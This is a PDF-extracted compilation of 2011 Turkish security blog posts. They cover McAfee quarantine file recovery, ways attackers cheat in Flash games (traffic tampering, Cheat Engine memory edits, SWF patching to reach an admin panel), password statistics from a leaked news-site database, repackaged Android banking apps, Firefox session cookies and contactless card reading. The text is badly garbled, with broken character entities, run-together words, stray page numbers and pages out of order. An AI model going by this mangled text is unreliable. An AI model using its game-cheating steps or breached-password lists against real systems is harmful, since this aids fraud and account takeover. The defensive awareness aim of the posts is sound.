Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 12: Hack 4 Career - 2011

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

